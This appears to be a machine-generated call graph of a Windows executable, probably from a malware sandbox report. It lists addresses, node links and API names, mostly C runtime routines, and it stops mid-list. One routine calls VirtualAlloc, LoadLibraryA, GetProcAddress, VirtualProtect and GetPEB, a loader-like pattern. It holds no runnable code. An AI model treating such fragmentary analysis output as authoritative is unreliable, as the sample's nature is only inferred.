f06e5d 11712->11741 11715 f05d9b 11715->11697 11718 f05db6 11718->11697 11721 f06d6d 11720->11721 11722 f06d4e 11720->11722 11721->11695 11723 f06d58 DeleteCriticalSection 11722->11723 11723->11721 11723->11723 11729 f06d72 11724->11729 11727 f06f84 InitializeCriticalSectionAndSpinCount 11728 f06f6f 11727->11728 11728->11707 11730 f06d93 11729->11730 11731 f06d8f 11729->11731 11730->11731 11732 f06dfb GetProcAddress 11730->11732 11734 f06dec 11730->11734 11736 f06e12 LoadLibraryExW 11730->11736 11731->11727 11731->11728 11732->11731 11734->11732 11735 f06df4 FreeLibrary 11734->11735 11735->11732 11737 f06e29 GetLastError 11736->11737 11738 f06e59 11736->11738 11737->11738 11739 f06e34 11737->11739 11738->11730 11739->11738 11740 f06e4a LoadLibraryExW 11739->11740 11740->11730 11742 f06d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11741->11742 11743 f06e77 11742->11743 11744 f06e90 TlsAlloc 11743->11744 11745 f05d90 11743->11745 11745->11715 11746 f06f0e 11745->11746 11747 f06d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11746->11747 11748 f06f28 11747->11748 11749 f06f43 TlsSetValue 11748->11749 11750 f05da9 11748->11750 11749->11750 11750->11718 11751 f05db9 11750->11751 11752 f05dc9 11751->11752 11753 f05dc3 11751->11753 11752->11715 11755 f06e98 11753->11755 11756 f06d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11755->11756 11757 f06eb2 11756->11757 11758 f06eca TlsFree 11757->11758 11759 f06ebe 11757->11759 11758->11759 11759->11752 11761 f05b87 11760->11761 11761->11649 11761->11761 11875 f03ce0 11762->11875 11765 f03ce0 41 API calls 11766 f036de 11765->11766 11879 f030a0 11766->11879 11772 f0374d 11773 f03ce0 41 API calls 11772->11773 11774 f03761 11773->11774 11775 f03ce0 41 API calls 11774->11775 11776 f0377d 11775->11776 11777 f03ce0 41 API calls 11776->11777 11778 f03796 11777->11778 11934 f03410 11778->11934 11781 f03ce0 41 API calls 11782 f037d0 11781->11782 11941 f03450 11782->11941 11785 f03ce0 41 API calls 11786 f037fc 11785->11786 11966 f03640 11786->11966 11789 f03ce0 41 API calls 11790 f0381d 11789->11790 11969 f02a80 11790->11969 11799 f03cc0 task 39 API calls 11800 f038ac 11799->11800 11801 f03ce0 41 API calls 11800->11801 11802 f038d5 11801->11802 11803 f03ce0 41 API calls 11802->11803 11804 f038f1 11803->11804 11805 f03ce0 41 API calls 11804->11805 11806 f0390a 11805->11806 12009 f02d00 11806->12009 11809 f03ce0 41 API calls 11810 f03932 11809->11810 11811 f03ce0 41 API calls 11810->11811 11812 f03950 11811->11812 12022 f02de0 11812->12022 11817 f03ce0 41 API calls 11818 f039b0 11817->11818 11819 f03ce0 41 API calls 11818->11819 11820 f039cc 11819->11820 12051 f01bc0 11820->12051 11823 f03ce0 41 API calls 11824 f03a41 11823->11824 11825 f03ce0 41 API calls 11824->11825 11826 f03a6f 11825->11826 12074 f01dd0 11826->12074 11835 f03cc0 task 39 API calls 11836 f03b3e 11835->11836 11837 f03ce0 41 API calls 11836->11837 11838 f03b50 11837->11838 12216 f027e0 11838->12216 11841 f03ce0 41 API calls 11842 f03b89 11841->11842 11843 f03ce0 41 API calls 11842->11843 11844 f03bad 11843->11844 12219 f02810 11844->12219 11847 f03cc0 task 39 API calls 11848 f03bd8 11847->11848 12227 f02950 11848->12227 12373 f01110 GetModuleHandleA 11851->12373 11853 f0173c 11854 f01110 17 API calls 11853->11854 11858 f01750 11854->11858 11855 f075a0 ___std_exception_destroy 14 API calls 11856 f01848 11855->11856 11857 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11856->11857 11860 f01855 11857->11860 11859 f07928 ___std_exception_copy 15 API calls 11858->11859 11867 f0183c 11858->11867 11861 f0178f 11859->11861 11868 f04704 11860->11868 12379 f01300 GetModuleHandleA VirtualAlloc 11861->12379 11864 f075a0 ___std_exception_destroy 14 API calls 11865 f01830 11864->11865 11866 f075a0 ___std_exception_destroy 14 API calls 11865->11866 11866->11867 11867->11855 11869 f0470c 11868->11869 11870 f0470d IsProcessorFeaturePresent 11868->11870 11869->11662 11872 f049fb 11870->11872 12392 f049be SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11872->12392 11874 f04ade 11874->11662 11876 f03d15 11875->11876 12242 f04090 11876->12242 11880 f03ce0 41 API calls 11879->11880 11881 f030df 11880->11881 11882 f03ce0 41 API calls 11881->11882 11883 f030f0 11882->11883 11884 f03ce0 41 API calls 11883->11884 11887 f03101 11884->11887 11885 f03cc0 task 39 API calls 11886 f03168 11885->11886 11888 f03cc0 task 39 API calls 11886->11888 11887->11885 11889 f03174 11888->11889 11890 f03cc0 task 39 API calls 11889->11890 11891 f03180 11890->11891 11892 f03cc0 task 39 API calls 11891->11892 11893 f0318c 11892->11893 11894 f03cc0 task 39 API calls 11893->11894 11895 f0319b 11894->11895 11896 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11895->11896 11897 f031b3 11896->11897 11898 f031c0 11897->11898 11899 f03ce0 41 API calls 11898->11899 11900 f03205 11899->11900 11901 f03ce0 41 API calls 11900->11901 11902 f03219 11901->11902 11903 f03ce0 41 API calls 11902->11903 11904 f0322a 11903->11904 11905 f03ce0 41 API calls 11904->11905 11906 f03268 11905->11906 11907 f03ce0 41 API calls 11906->11907 11908 f03285 11907->11908 11909 f03cc0 task 39 API calls 11908->11909 11910 f032a6 11909->11910 11911 f03cc0 task 39 API calls 11910->11911 11912 f032b5 11911->11912 11913 f03ce0 41 API calls 11912->11913 11914 f03333 11913->11914 11915 f03ce0 41 API calls 11914->11915 11916 f03353 11915->11916 11917 f03cc0 task 39 API calls 11916->11917 11918 f0337d 11917->11918 11919 f03cc0 task 39 API calls 11918->11919 11921 f0338c 11919->11921 11920 f03ce0 41 API calls 11922 f033bd 11920->11922 11921->11920 11923 f03cc0 task 39 API calls 11922->11923 11924 f033d2 11923->11924 11925 f03cc0 task 39 API calls 11924->11925 11926 f033de 11925->11926 11927 f03cc0 task 39 API calls 11926->11927 11928 f033ed 11927->11928 11929 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11928->11929 11930 f03405 11929->11930 11931 f03cc0 11930->11931 12355 f03dc0 11931->12355 11933 f03ccf task 11933->11772 11935 f03cc0 task 39 API calls 11934->11935 11936 f03432 11935->11936 11937 f03cc0 task 39 API calls 11936->11937 11938 f0343a 11937->11938 11939 f03cc0 task 39 API calls 11938->11939 11940 f03442 11939->11940 11940->11781 11942 f03ce0 41 API calls 11941->11942 11943 f03499 11942->11943 11944 f03ce0 41 API calls 11943->11944 11945 f034e9 11944->11945 11946 f03ce0 41 API calls 11945->11946 11947 f03506 11946->11947 11948 f03cc0 task 39 API calls 11947->11948 11949 f03527 11948->11949 11950 f03cc0 task 39 API calls 11949->11950 11952 f03536 11950->11952 11951 f03ce0 41 API calls 11953 f0356a 11951->11953 11952->11951 11954 f03ce0 41 API calls 11953->11954 11955 f03587 11954->11955 11956 f03cc0 task 39 API calls 11955->11956 11957 f035a8 11956->11957 11958 f03cc0 task 39 API calls 11957->11958 11960 f035b7 11958->11960 11959 f03cc0 task 39 API calls 11961 f0360e 11959->11961 11960->11959 11962 f03cc0 task 39 API calls 11961->11962 11963 f0361d 11962->11963 11964 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11963->11964 11965 f03635 11964->11965 11965->11785 11967 f03cc0 task 39 API calls 11966->11967 11968 f03658 11967->11968 11968->11789 11970 f03cc0 task 39 API calls 11969->11970 11971 f02a8f 11970->11971 11972 f02aa0 11971->11972 11973 f03ce0 41 API calls 11972->11973 11974 f02adf 11973->11974 11975 f03ce0 41 API calls 11974->11975 11976 f02af3 11975->11976 11977 f03ce0 41 API calls 11976->11977 11978 f02b04 11977->11978 11979 f03cc0 task 39 API calls 11978->11979 11980 f02b49 11979->11980 11981 f03cc0 task 39 API calls 11980->11981 11982 f02b55 11981->11982 11983 f03cc0 task 39 API calls 11982->11983 11984 f02b64 11983->11984 11985 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11984->11985 11986 f02b7c 11985->11986 11987 f02b80 11986->11987 11988 f03ce0 41 API calls 11987->11988 11989 f02bc2 11988->11989 11990 f03ce0 41 API calls 11989->11990 11991 f02bd6 11990->11991 11992 f03ce0 41 API calls 11991->11992 11993 f02c11 11992->11993 11994 f03ce0 41 API calls 11993->11994 11995 f02c2e 11994->11995 11996 f03cc0 task 39 API calls 11995->11996 11997 f02c4f 11996->11997 11998 f03cc0 task 39 API calls 11997->11998 12000 f02c5e 11998->12000 11999 f03cc0 task 39 API calls 12001 f02c9b 11999->12001 12000->11999 12002 f03cc0 task 39 API calls 12001->12002 12003 f02caa 12002->12003 12004 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12003->12004 12005 f02cc2 12004->12005 12006 f02cd0 12005->12006 12007 f03ce0 41 API calls 12006->12007 12008 f02ced 12007->12008 12008->11799 12010 f03ce0 41 API calls 12009->12010 12011 f02d3f 12010->12011 12012 f03cc0 task 39 API calls 12011->12012 12013 f02d90 12012->12013 12014 f03cc0 task 39 API calls 12013->12014 12015 f02d9c 12014->12015 12016 f03cc0 task 39 API calls 12015->12016 12017 f02da8 12016->12017 12018 f03cc0 task 39 API calls 12017->12018 12019 f02db7 12018->12019 12020 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12019->12020 12021 f02dd0 12020->12021 12021->11809 12024 f02e0b 12022->12024 12023 f03cc0 task 39 API calls 12025 f02e81 12023->12025 12024->12023 12026 f03cc0 task 39 API calls 12025->12026 12027 f02e89 12026->12027 12028 f02ea0 12027->12028 12029 f03ce0 41 API calls 12028->12029 12031 f02edf 12029->12031 12030 f03ce0 41 API calls 12032 f02f4d 12030->12032 12031->12030 12033 f03ce0 41 API calls 12032->12033 12034 f02f6a 12033->12034 12035 f03cc0 task 39 API calls 12034->12035 12036 f02f8b 12035->12036 12037 f03cc0 task 39 API calls 12036->12037 12039 f02f9a 12037->12039 12038 f03ce0 41 API calls 12040 f02fce 12038->12040 12039->12038 12041 f03ce0 41 API calls 12040->12041 12042 f02feb 12041->12042 12043 f03cc0 task 39 API calls 12042->12043 12044 f0300c 12043->12044 12045 f03cc0 task 39 API calls 12044->12045 12046 f0301b 12045->12046 12047 f03cc0 task 39 API calls 12046->12047 12048 f0307b 12047->12048 12049 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12048->12049 12050 f03093 12049->12050 12050->11817 12052 f03ce0 41 API calls 12051->12052 12053 f01c1c 12052->12053 12054 f03ce0 41 API calls 12053->12054 12055 f01c66 12054->12055 12056 f03ce0 41 API calls 12055->12056 12057 f01c7a 12056->12057 12058 f03ce0 41 API calls 12057->12058 12059 f01c97 12058->12059 12060 f03cc0 task 39 API calls 12059->12060 12061 f01cb8 12060->12061 12062 f03cc0 task 39 API calls 12061->12062 12064 f01cc7 12062->12064 12063 f03cc0 task 39 API calls 12065 f01d8b 12063->12065 12064->12063 12066 f03cc0 task 39 API calls 12065->12066 12067 f01d97 12066->12067 12068 f03cc0 task 39 API calls 12067->12068 12069 f01da3 12068->12069 12070 f03cc0 task 39 API calls 12069->12070 12071 f01db2 12070->12071 12072 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12071->12072 12073 f01dc7 12072->12073 12073->11823 12075 f03ce0 41 API calls 12074->12075 12076 f01e26 12075->12076 12077 f03ce0 41 API calls 12076->12077 12078 f01e3a 12077->12078 12079 f03ce0 41 API calls 12078->12079 12080 f01e57 12079->12080 12081 f03cc0 task 39 API calls 12080->12081 12082 f01e78 12081->12082 12083 f03cc0 task 39 API calls 12082->12083 12085 f01e87 12083->12085 12084 f03ce0 41 API calls 12086 f01efb 12084->12086 12085->12084 12087 f03ce0 41 API calls 12086->12087 12088 f01f18 12087->12088 12089 f03cc0 task 39 API calls 12088->12089 12090 f01f39 12089->12090 12091 f03cc0 task 39 API calls 12090->12091 12092 f01f48 12091->12092 12093 f03cc0 task 39 API calls 12092->12093 12094 f01f9f 12093->12094 12095 f03cc0 task 39 API calls 12094->12095 12096 f01fab 12095->12096 12097 f03cc0 task 39 API calls 12096->12097 12098 f01fba 12097->12098 12099 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12098->12099 12100 f01fd2 12099->12100 12101 f01fe0 12100->12101 12102 f03ce0 41 API calls 12101->12102 12103 f0201b 12102->12103 12104 f03ce0 41 API calls 12103->12104 12105 f02032 12104->12105 12106 f03ce0 41 API calls 12105->12106 12107 f0204c 12106->12107 12108 f03cc0 task 39 API calls 12107->12108 12109 f0206a 12108->12109 12110 f03cc0 task 39 API calls 12109->12110 12113 f02079 12110->12113 12111 f03ce0 41 API calls 12112 f020ad 12111->12112 12114 f03ce0 41 API calls 12112->12114 12113->12111 12115 f020ca 12114->12115 12116 f03cc0 task 39 API calls 12115->12116 12117 f020eb 12116->12117 12118 f03cc0 task 39 API calls 12117->12118 12121 f020fa 12118->12121 12119 f03ce0 41 API calls 12120 f0212e 12119->12120 12122 f03ce0 41 API calls 12120->12122 12121->12119 12123 f0214b 12122->12123 12124 f03cc0 task 39 API calls 12123->12124 12125 f0216c 12124->12125 12126 f03cc0 task 39 API calls 12125->12126 12129 f0217b 12126->12129 12127 f03cc0 task 39 API calls 12128 f021ae 12127->12128 12130 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12128->12130 12129->12127 12131 f021c3 12130->12131 12132 f021d0 12131->12132 12133 f03ce0 41 API calls 12132->12133 12134 f02220 12133->12134 12135 f03ce0 41 API calls 12134->12135 12136 f02260 12135->12136 12137 f03ce0 41 API calls 12136->12137 12138 f02274 12137->12138 12139 f03ce0 41 API calls 12138->12139 12140 f02291 12139->12140 12141 f03cc0 task 39 API calls 12140->12141 12142 f022b2 12141->12142 12143 f03cc0 task 39 API calls 12142->12143 12145 f022c1 12143->12145 12144 f03ce0 41 API calls 12146 f022f5 12144->12146 12145->12144 12147 f03ce0 41 API calls 12146->12147 12148 f02312 12147->12148 12149 f03cc0 task 39 API calls 12148->12149 12150 f02333 12149->12150 12151 f03cc0 task 39 API calls 12150->12151 12154 f02342 12151->12154 12152 f03cc0 task 39 API calls 12153 f023c3 12152->12153 12155 f03cc0 task 39 API calls 12153->12155 12154->12152 12156 f023d2 12155->12156 12157 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12156->12157 12158 f023ea 12157->12158 12159 f023f0 12158->12159 12160 f03ce0 41 API calls 12159->12160 12161 f02438 12160->12161 12162 f03ce0 41 API calls 12161->12162 12163 f0245c 12162->12163 12164 f03ce0 41 API calls 12163->12164 12165 f0247a 12164->12165 12166 f03ce0 41 API calls 12165->12166 12167 f0248b 12166->12167 12168 f03ce0 41 API calls 12167->12168 12170 f0249c 12168->12170 12169 f03ce0 41 API calls 12171 f024dc 12169->12171 12170->12169 12172 f03ce0 41 API calls 12171->12172 12173 f02502 12172->12173 12174 f03cc0 task 39 API calls 12173->12174 12175 f0252f 12174->12175 12176 f03cc0 task 39 API calls 12175->12176 12178 f0253e 12176->12178 12177 f03ce0 41 API calls 12179 f02581 12177->12179 12178->12177 12180 f03ce0 41 API calls 12179->12180 12181 f025a7 12180->12181 12182 f03cc0 task 39 API calls 12181->12182 12183 f025d4 12182->12183 12184 f03cc0 task 39 API calls 12183->12184 12186 f025e3 12184->12186 12185 f03ce0 41 API calls 12187 f02626 12185->12187 12186->12185 12188 f03ce0 41 API calls 12187->12188 12189 f0264c 12188->12189 12190 f03cc0 task 39 API calls 12189->12190 12191 f02679 12190->12191 12192 f03cc0 task 39 API calls 12191->12192 12194 f02688 12192->12194 12193 f03ce0 41 API calls 12195 f026cb 12193->12195 12194->12193 12196 f03ce0 41 API calls 12195->12196 12197 f026f1 12196->12197 12198 f03cc0 task 39 API calls 12197->12198 12199 f0271e 12198->12199 12200 f03cc0 task 39 API calls 12199->12200 12202 f0272d 12200->12202 12201 f03ce0 41 API calls 12203 f0276d 12201->12203 12202->12201 12204 f03cc0 task 39 API calls 12203->12204 12205 f02788 12204->12205 12206 f03cc0 task 39 API calls 12205->12206 12207 f02794 12206->12207 12208 f03cc0 task 39 API calls 12207->12208 12209 f027a3 12208->12209 12210 f03cc0 task 39 API calls 12209->12210 12211 f027af 12210->12211 12212 f03cc0 task 39 API calls 12211->12212 12213 f027be 12212->12213 12214 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12213->12214 12215 f027d6 12214->12215 12215->11835 12217 f03cc0 task 39 API calls 12216->12217 12218 f0280a 12217->12218 12218->11841 12220 f02886 12219->12220 12221 f03ce0 41 API calls 12220->12221 12222 f02914 12221->12222 12223 f03cc0 task 39 API calls 12222->12223 12224 f02929 12223->12224 12225 f03cc0 task 39 API calls 12224->12225 12226 f02938 12225->12226 12226->11847 12228 f03ce0 41 API calls 12227->12228 12229 f02988 12228->12229 12230 f03ce0 41 API calls 12229->12230 12231 f029b0 12230->12231 12232 f03ce0 41 API calls 12231->12232 12234 f029c1 12232->12234 12233 f03cc0 task 39 API calls 12235 f02a3b 12233->12235 12234->12233 12236 f03cc0 task 39 API calls 12235->12236 12237 f02a47 12236->12237 12238 f03cc0 task 39 API calls 12237->12238 12239 f02a56 12238->12239 12240 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12239->12240 12241 f02a6e LPtoDP 12240->12241 12241->11654 12241->11655 12255 f04300 12242->12255 12246 f040bb task 12247 f04300 5 API calls 12246->12247 12254 f040e3 task 12246->12254 12248 f04136 12247->12248 12262 f04250 12248->12262 12252 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12253 f036ad 12252->12253 12253->11765 12254->12252 12256 f0431b _Min_value task _Max_value 12255->12256 12257 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12256->12257 12258 f040b1 12257->12258 12258->12246 12259 f01bb0 12258->12259 12269 f046e4 12259->12269 12263 f04271 _Max_value 12262->12263 12264 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12263->12264 12265 f04142 12264->12265 12266 f04410 12265->12266 12312 f04500 12266->12312 12274 f0466c 12269->12274 12273 f04703 12280 f0461c 12274->12280 12277 f058f4 12278 f0593b RaiseException 12277->12278 12279 f0590e 12277->12279 12278->12273 12279->12278 12283 f056b4 12280->12283 12284 f056c1 12283->12284 12290 f04648 12283->12290 12284->12290 12291 f07928 12284->12291 12287 f056ee 12309 f075a0 12287->12309 12290->12277 12292 f093a5 12291->12292 12293 f093e3 12292->12293 12294 f093ce HeapAlloc 12292->12294 12298 f093b7 _unexpected 12292->12298 12295 f0964a ___free_lconv_mon 14 API calls 12293->12295 12297 f093e1 12294->12297 12294->12298 12296 f056de 12295->12296 12296->12287 12300 f08bc3 12296->12300 12297->12296 12298->12293 12298->12294 12299 f0795d _Allocate EnterCriticalSection LeaveCriticalSection 12298->12299 12299->12298 12301 f08bd1 12300->12301 12302 f08bdf 12300->12302 12301->12302 12304 f08bf7 12301->12304 12303 f0964a ___free_lconv_mon 14 API calls 12302->12303 12308 f08be7 12303->12308 12306 f08bf1 12304->12306 12307 f0964a ___free_lconv_mon 14 API calls 12304->12307 12305 f078c7 CallUnexpected 39 API calls 12305->12306 12306->12287 12307->12308 12308->12305 12310 f08d42 ___free_lconv_mon 14 API calls 12309->12310 12311 f075b8 12310->12311 12311->12290 12315 f04520 12312->12315 12316 f04530 allocator 12315->12316 12319 f04550 12316->12319 12320 f0456a 12319->12320 12321 f0455c 12319->12321 12323 f0442e 12320->12323 12333 f01b00 12320->12333 12325 f045a0 12321->12325 12323->12254 12326 f045b7 12325->12326 12327 f045bc 12325->12327 12336 f01a80 12326->12336 12328 f01b00 _Allocate 16 API calls 12327->12328 12330 f045c5 12328->12330 12332 f045e0 12330->12332 12340 f078d7 12330->12340 12332->12323 12345 f04712 12333->12345 12337 f01a8e stdext::threads::lock_error::lock_error 12336->12337 12338 f058f4 CallUnexpected RaiseException 12337->12338 12339 f01a9c 12338->12339 12339->12327 12341 f07813 _Allocate 39 API calls 12340->12341 12342 f078e6 12341->12342 12343 f078f4 _Allocate 11 API calls 12342->12343 12344 f078f3 12343->12344 12348 f04717 12345->12348 12346 f07928 ___std_exception_copy 15 API calls 12346->12348 12347 f01b0c 12347->12323 12348->12346 12348->12347 12349 f0795d _Allocate EnterCriticalSection LeaveCriticalSection 12348->12349 12351 f04733 _Allocate 12348->12351 12349->12348 12350 f04afc stdext::threads::lock_error::lock_error 12352 f058f4 CallUnexpected RaiseException 12350->12352 12351->12350 12353 f058f4 CallUnexpected RaiseException 12351->12353 12354 f04b19 12352->12354 12353->12350 12357 f03dd7 task 12355->12357 12356 f03e07 task 12356->11933 12357->12356 12359 f03ee0 12357->12359 12362 f03fe0 12359->12362 12365 f041f0 12362->12365 12364 f03f15 12364->12356 12366 f0421b 12365->12366 12368 f04228 _MallocaArrayHolder 12365->12368 12369 f01b20 12366->12369 12368->12364 12370 f01b5e 12369->12370 12371 f078d7 _Allocate 39 API calls 12370->12371 12372 f01b79 12370->12372 12371->12370 12372->12368 12374 f01132 12373->12374 12375 f0115a GetModuleHandleW 12374->12375 12376 f0117f 12375->12376 12377 f07928 ___std_exception_copy 15 API calls 12376->12377 12378 f011ad __InternalCxxFrameHandler 12376->12378 12377->12378 12378->11853 12380 f01352 12379->12380 12384 f01359 __InternalCxxFrameHandler 12379->12384 12381 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12380->12381 12382 f016b0 GetPEB GetUserDefaultLCID 12381->12382 12382->11864 12383 f014ef 12385 f01508 VirtualProtect 12383->12385 12384->12383 12386 f0142f GetModuleHandleA GetProcAddress LoadLibraryA 12384->12386 12389 f014d5 GetProcAddress 12384->12389 12387 f0152a 12385->12387 12386->12384 12387->12380 12388 f01573 VirtualFree 12387->12388 12391 f01593 VirtualProtect 12387->12391 12388->12387 12389->12384 12391->12380 12392->11874 12394 f090d0 12393->12394 12395 f090d6 12393->12395 12438 f0b568 12394->12438 12399 f090da SetLastError 12395->12399 12443 f0b5a7 12395->12443 12402 f08b54 12399->12402 12403 f0916f 12399->12403 12420 f08b7f 12402->12420 12405 f08b7f CallUnexpected 37 API calls 12403->12405 12409 f09174 12405->12409 12406 f09120 12408 f0b5a7 _unexpected 6 API calls 12406->12408 12407 f0910f 12410 f0b5a7 _unexpected 6 API calls 12407->12410 12412 f0912c 12408->12412 12411 f0911d 12410->12411 12455 f08d42 12411->12455 12413 f09130 12412->12413 12414 f09147 12412->12414 12415 f0b5a7 _unexpected 6 API calls 12413->12415 12461 f08ee8 12414->12461 12415->12411 12419 f08d42 ___free_lconv_mon 14 API calls 12419->12399 12662 f0b8ff 12420->12662 12423 f08b8f 12424 f08b99 IsProcessorFeaturePresent 12423->12424 12425 f08bb8 12423->12425 12427 f08ba5 12424->12427 12428 f08498 CallUnexpected 21 API calls 12425->12428 12692 f076cb 12427->12692 12431 f08bc2 12428->12431 12430 f08bdf 12432 f0964a ___free_lconv_mon 14 API calls 12430->12432 12431->12430 12435 f08bf7 12431->12435 12437 f08be7 12432->12437 12434 f08b7e 12435->12434 12436 f0964a ___free_lconv_mon 14 API calls 12435->12436 12436->12437 12698 f078c7 12437->12698 12466 f0b425 12438->12466 12440 f0b584 12441 f0b59f TlsGetValue 12440->12441 12442 f0b58d 12440->12442 12442->12395 12444 f0b425 _unexpected 5 API calls 12443->12444 12445 f0b5c3 12444->12445 12446 f0b5e1 TlsSetValue 12445->12446 12447 f090f2 12445->12447 12447->12399 12448 f0965d 12447->12448 12449 f0966a _unexpected 12448->12449 12450 f096aa 12449->12450 12451 f09695 HeapAlloc 12449->12451 12480 f0795d 12449->12480 12483 f0964a 12450->12483 12451->12449 12453 f09107 12451->12453 12453->12406 12453->12407 12456 f08d77 12455->12456 12457 f08d4d HeapFree 12455->12457 12456->12399 12457->12456 12458 f08d62 GetLastError 12457->12458 12459 f08d6f ___free_lconv_mon 12458->12459 12460 f0964a ___free_lconv_mon 12 API calls 12459->12460 12460->12456 12520 f08d7c 12461->12520 12467 f0b455 12466->12467 12471 f0b451 _unexpected 12466->12471 12467->12471 12472 f0b35a 12467->12472 12470 f0b46f GetProcAddress 12470->12471 12471->12440 12473 f0b36b 12472->12473 12474 f0b401 12473->12474 12475 f0b389 LoadLibraryExW 12473->12475 12479 f0b3d7 LoadLibraryExW 12473->12479 12474->12470 12474->12471 12476 f0b3a4 GetLastError 12475->12476 12477 f0b408 12475->12477 12476->12473 12477->12474 12478 f0b41a FreeLibrary 12477->12478 12478->12474 12479->12473 12479->12477 12486 f07989 12480->12486 12497 f0920b GetLastError 12483->12497 12485 f0964f 12485->12453 12487 f07995 ___scrt_is_nonwritable_in_current_image 12486->12487 12492 f09434 EnterCriticalSection 12487->12492 12489 f079a0 CallUnexpected 12493 f079d7 12489->12493 12492->12489 12496 f0947c LeaveCriticalSection 12493->12496 12495 f07968 12495->12449 12496->12495 12498 f09221 12497->12498 12501 f09227 12497->12501 12499 f0b568 _unexpected 6 API calls 12498->12499 12499->12501 12500 f0b5a7 _unexpected 6 API calls 12502 f09243 12500->12502 12501->12500 12517 f0922b SetLastError 12501->12517 12504 f0965d _unexpected 12 API calls 12502->12504 12502->12517 12505 f09258 12504->12505 12506 f09260 12505->12506 12507 f09271 12505->12507 12508 f0b5a7 _unexpected 6 API calls 12506->12508 12509 f0b5a7 _unexpected 6 API calls 12507->12509 12510 f0926e 12508->12510 12511 f0927d 12509->12511 12516 f08d42 ___free_lconv_mon 12 API calls 12510->12516 12512 f09281 12511->12512 12513 f09298 12511->12513 12515 f0b5a7 _unexpected 6 API calls 12512->12515 12514 f08ee8 _unexpected 12 API calls 12513->12514 12518 f092a3 12514->12518 12515->12510 12516->12517 12517->12485 12519 f08d42 ___free_lconv_mon 12 API calls 12518->12519 12519->12517 12521 f08d88 ___scrt_is_nonwritable_in_current_image 12520->12521 12534 f09434 EnterCriticalSection 12521->12534 12523 f08d92 12535 f08dc2 12523->12535 12526 f08e8e 12527 f08e9a ___scrt_is_nonwritable_in_current_image 12526->12527 12539 f09434 EnterCriticalSection 12527->12539 12529 f08ea4 12540 f0906f 12529->12540 12531 f08ebc 12544 f08edc 12531->12544 12534->12523 12538 f0947c LeaveCriticalSection 12535->12538 12537 f08db0 12537->12526 12538->12537 12539->12529 12541 f090a5 _unexpected 12540->12541 12542 f0907e _unexpected 12540->12542 12541->12531 12542->12541 12547 f0b009 12542->12547 12661 f0947c LeaveCriticalSection 12544->12661 12546 f08eca 12546->12419 12548 f0b089 12547->12548 12551 f0b01f 12547->12551 12550 f08d42 ___free_lconv_mon 14 API calls 12548->12550 12573 f0b0d7 12548->12573 12552 f0b0ab 12550->12552 12551->12548 12555 f0b052 12551->12555 12557 f08d42 ___free_lconv_mon 14 API calls 12551->12557 12553 f08d42 ___free_lconv_mon 14 API calls 12552->12553 12554 f0b0be 12553->12554 12558 f08d42 ___free_lconv_mon 14 API calls 12554->12558 12559 f08d42 ___free_lconv_mon 14 API calls 12555->12559 12574 f0b074 12555->12574 12556 f08d42 ___free_lconv_mon 14 API calls 12560 f0b07e 12556->12560 12562 f0b047 12557->12562 12564 f0b0cc 12558->12564 12565 f0b069 12559->12565 12566 f08d42 ___free_lconv_mon 14 API calls 12560->12566 12561 f0b145 12567 f08d42 ___free_lconv_mon 14 API calls 12561->12567 12575 f0abad 12562->12575 12569 f08d42 ___free_lconv_mon 14 API calls 12564->12569 12603 f0acab 12565->12603 12566->12548 12572 f0b14b 12567->12572 12568 f0b0e5 12568->12561 12571 f08d42 14 API calls ___free_lconv_mon 12568->12571 12569->12573 12571->12568 12572->12541 12615 f0b17a 12573->12615 12574->12556 12576 f0abbe 12575->12576 12602 f0aca7 12575->12602 12577 f0abcf 12576->12577 12578 f08d42 ___free_lconv_mon 14 API calls 12576->12578 12579 f0abe1 12577->12579 12580 f08d42 ___free_lconv_mon 14 API calls 12577->12580 12578->12577 12581 f0abf3 12579->12581 12582 f08d42 ___free_lconv_mon 14 API calls 12579->12582 12580->12579 12583 f0ac05 12581->12583 12585 f08d42 ___free_lconv_mon 14 API calls 12581->12585 12582->12581 12584 f0ac17 12583->12584 12586 f08d42 ___free_lconv_mon 14 API calls 12583->12586 12587 f0ac29 12584->12587 12588 f08d42 ___free_lconv_mon 14 API calls 12584->12588 12585->12583 12586->12584 12589 f0ac3b 12587->12589 12590 f08d42 ___free_lconv_mon 14 API calls 12587->12590 12588->12587 12591 f0ac4d 12589->12591 12593 f08d42 ___free_lconv_mon 14 API calls 12589->12593 12590->12589 12592 f0ac5f 12591->12592 12594 f08d42 ___free_lconv_mon 14 API calls 12591->12594 12595 f0ac71 12592->12595 12596 f08d42 ___free_lconv_mon 14 API calls 12592->12596 12593->12591 12594->12592 12597 f08d42 